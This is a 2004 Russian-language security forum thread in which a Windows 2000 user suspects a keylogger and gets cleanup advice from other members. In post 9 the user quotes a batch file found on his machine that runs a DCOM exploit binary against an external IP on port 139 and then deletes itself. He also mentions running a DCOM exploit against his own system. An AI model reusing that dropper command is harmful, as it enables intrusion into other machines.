imho.ws
IMHO.WS  

Вернуться   IMHO.WS > Интернет, Глобальные и Локальные сети > Безопасность
Опции темы
Старый 23.05.2004, 14:33     # 1
Псих
::VIP::
Guinness Liker
Понаехало тут
 
Аватар для Псих
 
Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848

Псих СуперБогПсих СуперБог
Псих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБог
Unhappy Прога отыскивающая логеры

Ситуация какая...
Есть подозрения, что меня ломанули и подцепили на лог.
Как проверить стоит ли в системе какие-то проги-логи?
А еще глюк... Раньше все было гут, а с определенного времени фаервол начал блокировать ВСЕ протоколы.. Тоесть если стена включена, то ничего не грузится и не работает..
Есть какие-то идеи?
__________________
меня не вылечат
Псих вне форума  
Старый 23.05.2004, 15:09     # 2
FantomIL
NetMOD
 
Аватар для FantomIL
 
Регистрация: 19.05.2003
Адрес: МосПодЛод - НачВод-АккОт
Сообщения: 2 376

FantomIL СуперБогFantomIL СуперБог
FantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБогFantomIL СуперБог
Какая операционка?
Какой файрволл?
В общем случае проверяем все места, откуда возможен автостарт и режем все, что нам незнакомо.
Для стенки - внимательно проверяем настройки и правила.
Также, проверяем систему на предмет вирусов и рекламно-шпионских модулей.
__________________
Красная точка лазерного прицела на вашем лбу это тоже чья-то точка зрения...
---------
Репутация – это то, без чего могут жить люди с характером
FantomIL вне форума  
Старый 23.05.2004, 15:43     # 3
Псих
::VIP::
Guinness Liker
Понаехало тут
 
Аватар для Псих
 
Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848

Псих СуперБогПсих СуперБог
Псих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБог
Система Win2k последние СП и заплатки.. Стена- VisNetic FireWall
Что странно появился в system32 файл sysconf.exe (регнулся в регах, стер я их потом)(удаление ничего не дало), с датой создания в день начала глюков. а еще непонятная мини дос атака с моего же айпишника...
хм.. звучит тупо
вообщем по 30 протоколов в секунду при условии , что ничего не работает. И все с моего айпишника, либо с айпи моего сервака.. по разным портам идут.
__________________
меня не вылечат
Псих вне форума  
Старый 24.05.2004, 15:05     # 4
mishgan2
Junior Member
 
Регистрация: 05.02.2004
Сообщения: 53

mishgan2 Нуль без палочки
Ну а что говорят обычные антивирусы?
mishgan2 вне форума  
Старый 24.05.2004, 16:31     # 5
Interceptor
Banned
 
Аватар для Interceptor
 
Регистрация: 04.09.2002
Адрес: В сети ;)
Сообщения: 783

Interceptor Давно пора выгнатьInterceptor Давно пора выгнатьInterceptor Давно пора выгнатьInterceptor Давно пора выгнать
Псих
Почитай обзор прог для отлова кейлоггеров здесь: http://www1.xakep.ru/magazine/xa/060/042/1.asp

P.S. Не забудь: внизу страницы, что загрузится, есть ссылка - продолжение статьи
Interceptor вне форума  
Старый 29.05.2004, 16:12     # 6
Псих
::VIP::
Guinness Liker
Понаехало тут
 
Аватар для Псих
 
Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848

Псих СуперБогПсих СуперБог
Псих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБог
Цитата:
Сообщение от mishgan2
Ну а что говорят обычные антивирусы?
Антивирусы молчат!
__________________
меня не вылечат
Псих вне форума  
Старый 29.05.2004, 16:15     # 7
Псих
::VIP::
Guinness Liker
Понаехало тут
 
Аватар для Псих
 
Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848

Псих СуперБогПсих СуперБог
Псих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБог
Ща вот начало доходить кое-что...
Пару раз было, что svhost.exe уходил в даун. А это очень схоже на RPC DCOM
аля msblast.exe или его клоны... Но в системе бласта нет, я проверил.
Что теперь скажете?
Кстати после этого взял эксплойт по этой уязвимости и введя 127.0.0.1 "отимел" свою систему, хотя заплатка против этой дыры стоит. Кто че скажет и на это?
__________________
меня не вылечат
Псих вне форума  
Старый 29.05.2004, 20:09     # 8
Псих
::VIP::
Guinness Liker
Понаехало тут
 
Аватар для Псих
 
Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848

Псих СуперБогПсих СуперБог
Псих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБог
Свежие новости:
Натравил на свой винь прогу Стингер по отлову троев и оказалось, что в корне виня сидел dcom.trojan.exe (хотя антик его не находил).
Обрадовался, думал все, но оказалось не все.. тока вошел с той винды в сеть ,снова svhost.exe ушел в даун.. и все началось по новойй.... ((((
__________________
меня не вылечат
Псих вне форума  
Старый 30.05.2004, 19:12     # 9
Псих
::VIP::
Guinness Liker
Понаехало тут
 
Аватар для Псих
 
Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848

Псих СуперБогПсих СуперБог
Псих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБог
Exclamation

Вот что я нашел у себя в системе по адресу C:\Winodws

файл называется DCOM.Bat и является логическим продолжением прошлого поста. Листинг файла:
@echo off
cd C:\WINDOWS
cls
echo Dropping dcom.exe and cygwin1.dll...
echo Executing C:\WINDOWS\dcom.exe...
echo.
dcom.exe -d 195.5.8.76 -t 1 -r 0100139d -p 139 -l 3846
Echo.
pause
del C:\WINDOWS\DCOM.bat


=======
Помогите, что делать..
__________________
меня не вылечат
Псих вне форума  
Старый 31.05.2004, 01:22     # 10
gertako3
Banned
 
Аватар для gertako3
 
Регистрация: 13.05.2004
Сообщения: 49

gertako3 Путь к славе только начался
Сноси его нафиг!!! или систему
gertako3 вне форума  
Старый 31.05.2004, 03:46     # 11
Псих
::VIP::
Guinness Liker
Понаехало тут
 
Аватар для Псих
 
Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848

Псих СуперБогПсих СуперБог
Псих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБогПсих СуперБог
Мне нужно знать.. это вирус или трой?
__________________
меня не вылечат
Псих вне форума  
Старый 01.06.2004, 09:01     # 12
Arc
Banned
 
Аватар для Arc
 
Регистрация: 31.05.2004
Адрес: Омск
Сообщения: 65

Arc Путь к славе только начался
Привет, Псих. Ты не ответил ходишь ли ты на ВиндоузАпдейт. Если все заплатки точно установленны через Винапдейт т окакой у тебя Антивирь?
Один ибо другому рознь.

А вообще есть такая штука как SFC /SCANNOW

Проверь все системные файлы.

Ну и хорошо бы бекапиться впредь. Типа ERUNT. Каждый день при логоне бекап реестра. А раз в месяц системы NTbackup'ом.

Вот в принципе все ну еще есть список авторанов для прог. Ну это так...
Arc вне форума  
Старый 01.06.2004, 14:02     # 13
Interceptor
Banned
 
Аватар для Interceptor
 
Регистрация: 04.09.2002
Адрес: В сети ;)
Сообщения: 783

Interceptor Давно пора выгнатьInterceptor Давно пора выгнатьInterceptor Давно пора выгнатьInterceptor Давно пора выгнать
Псих
Странно: ты установил заплатку, а она никакая? А ты уверен, что эта та самая заплатка? Может, другую качнул?
И ещё: ставь стенку. Давно бы пора её поставить
Цитата:
Мне нужно знать.. это вирус или трой?
А какая хрен разница? Одно могу сказать: файлы dcom.exe and cygwin1.dll - это файлы-сплоиты, юзающие эту самую дыру в винде
Interceptor вне форума  
Старый 07.06.2004, 19:43     # 14
Partyzan
Junior Member
 
Регистрация: 06.01.2004
Адрес: Москва
Сообщения: 165

Partyzan МолодецPartyzan МолодецPartyzan Молодец
Псих
Вирус, трой - какая в принципе разница? Сноси все лишнее


Arc
Хороший подход, системный. Эх, раздолбаем себя таким почувствовал.. :-)
Partyzan вне форума  

Опции темы

Ваши права в разделе
Вы НЕ можете создавать новые темы
Вы не можете отвечать в темах.
Вы НЕ можете прикреплять вложения
Вы НЕ можете редактировать свои сообщения

BB код Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +4, время: 22:10.




Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.